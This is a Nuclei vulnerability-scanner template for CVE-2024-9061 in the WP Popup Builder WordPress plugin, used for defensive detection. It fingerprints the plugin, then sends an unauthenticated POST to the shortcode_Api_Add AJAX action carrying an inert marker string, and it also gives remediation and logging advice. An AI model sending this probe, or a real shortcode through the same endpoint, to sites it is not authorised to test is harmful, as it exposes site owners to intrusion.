nuclei-templates/http/cves/2024/CVE-2024-9061.yaml


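# Detection template for CVE-2024-9061 (WP Popup Builder <= 1.3.5).
# Two requests run in sequence: a passive fingerprint of the plugin, then one
# probe of the unauthenticated AJAX action using an inert marker string.
id: CVE-2024-9061

info:
  name: WP Popup Builder Popup Forms and Marketing Lead Generation <= 1.3.5 - Arbitrary Shortcode Execution
  author: s4e-io
  severity: high
  description: |
    The WP Popup Builder Popup Forms and Marketing Lead Generation plugin for WordPress is vulnerable to arbitrary shortcode execution via the wp_ajax_nopriv_shortcode_Api_Add AJAX action in all versions up to, and including, 1.3.5. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.
  # Derived from the affected range stated in the description; confirm the
  # fixed release against the vendor changelog before citing a version.
  remediation: |
    Update WP Popup Builder to a release later than 1.3.5, or deactivate the plugin until such a release is installed.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-9061
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/0cac1dc0-87dc-43eb-9db1-638a91200b43?source=cve
    - https://github.com/RandomRobbieBF/CVE-2024-9061
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cve-id: CVE-2024-9061
    cwe-id: CWE-94
    epss-score: 0.00046
    epss-percentile: 0.18015
  metadata:
    max-request: 2
    verified: true
    vendor: themehunk
    product: wp-popup-builder
    framework: wordpress
    fofa-query: body="/wp-content/plugins/wp-popup-builder/"
  tags: cve,cve2024,wp,wordpress,wp-plugin,wp-popup-builder,shortcode

# Request 2 is only evaluated when request 1 matched, so hosts that do not
# appear to run the plugin never receive the POST.
flow: http(1) && http(2)

http:
  # Step 1 - fingerprint: the front page must return 200 and reference the
  # plugin's asset directory. The matcher is internal, so it gates the flow
  # without producing a finding of its own.
  # NOTE(review): a site that loads the plugin's assets only on other pages
  # would presumably be skipped here (false negative) - confirm coverage.
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "/wp-content/plugins/wp-popup-builder")'
          - 'status_code == 200'
        condition: and
        internal: true

  # Step 2 - probe: the shortcode parameter is the URL-encoded literal
  # "CVE-2024-9061" (13 characters, no shortcode tag in it), sent without any
  # cookie or nonce. A 200 text/html response whose body is exactly that
  # string shows the action answered an unauthenticated caller with the
  # processed value. The length check rejects pages that merely contain the
  # marker somewhere in a larger body.
  # NOTE(review): an exact length of 13 would presumably miss a response that
  # carries stray whitespace or a BOM - verify against a known-affected host.
  # Defenders: unauthenticated POSTs to /wp-admin/admin-ajax.php carrying
  # action=shortcode_Api_Add are worth alerting on in WAF or request-body logs.
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=shortcode_Api_Add&shortcode=%43%56%45%2d%32%30%32%34%2d%39%30%36%31

    matchers:
      - type: dsl
        dsl:
          - 'len(body) == 13'
          - 'contains(body, "CVE-2024-9061")'
          - 'contains(content_type, "text/html")'
          - 'status_code == 200'
        condition: and
# NOTE(review): the digest below was issued for the upstream text of this
# template. Any edit to the file, comments included, presumably invalidates
# it - re-sign the template before relying on signature verification.
# digest: 4b0a00483046022100f80fec38e7c5f649695bac35530600b4fbfa1daa9782d746571908c193ec333d022100f9b434ac3748d54c493f2ad2d7bf045e53c97e1abd079858c054b0ce2f03e0e5:922c64590222798bb761d5b6d8e72950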